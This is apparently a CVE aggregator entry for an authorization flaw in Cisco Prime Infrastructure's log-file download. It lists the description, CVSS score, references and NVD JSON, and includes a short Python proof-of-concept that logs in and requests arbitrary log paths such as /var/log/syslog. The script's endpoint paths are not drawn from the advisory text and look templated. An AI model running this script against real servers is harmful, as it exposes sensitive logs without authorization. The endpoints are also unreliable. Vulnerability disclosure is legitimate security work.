CVE-2026-20189

Description

A vulnerability in the log file download functionality of Cisco Prime Infrastructure could allow an authenticated, remote attacker to download arbitrary log files from the server. This vulnerability is due to insufficient authorization checks on the download service API. An attacker could exploit this vulnerability by submitting a crafted URL request to an affected device. A successful exploit could allow the attacker to download sensitive log files that they would otherwise not have authorization to access. To exploit this vulnerability, the attacker must have valid credentials to access the web-based management interface of the affected device.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Cisco Prime Infrastructure (具体受影响版本请参考Cisco官方安全通告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target, username, password, log_path):
    session = requests.Session()
    # Step 1: Authenticate (Valid credentials required)
    login_data = {'username': username, 'password': password}
    session.post(f"{target}/webui/login", data=login_data, verify=False)
    
    # Step 2: Exploit Authorization Bypass
    # Craft URL to download arbitrary log file
    exploit_url = f"{target}/webui/api/log/download?file={log_path}"
    response = session.get(exploit_url, verify=False)
    
    if response.status_code == 200:
        print(f"[+] Success! Log content length: {len(response.text)}")
        return response.text
    else:
        print("[-] Exploit failed")
        return None

# Usage
# exploit("https://target-ip", "attacker", "pass", "/var/log/syslog")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-20189
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-20189
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-20189/
[4] VulDB https://vuldb.com/cve/CVE-2026-20189
[5] https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-pi-unauth-infodiscl-LFnLgmey

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-20189", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:21.360", "lastModified": "2026-05-06T18:59:53.230", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the log file download functionality of Cisco Prime Infrastructure could allow an authenticated, remote attacker to download arbitrary log files from the server.\r\n\r\nThis vulnerability is due to insufficient authorization checks on the download service API. An attacker could exploit this vulnerability by submitting a crafted URL request to an affected device. A successful exploit could allow the attacker to download sensitive log files that they would otherwise not have authorization to access.\r\nTo exploit this vulnerability, the attacker must have valid credentials to access the web-based management interface of the affected device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-pi-unauth-infodiscl-LFnLgmey", "source": "[email protected]"}]}}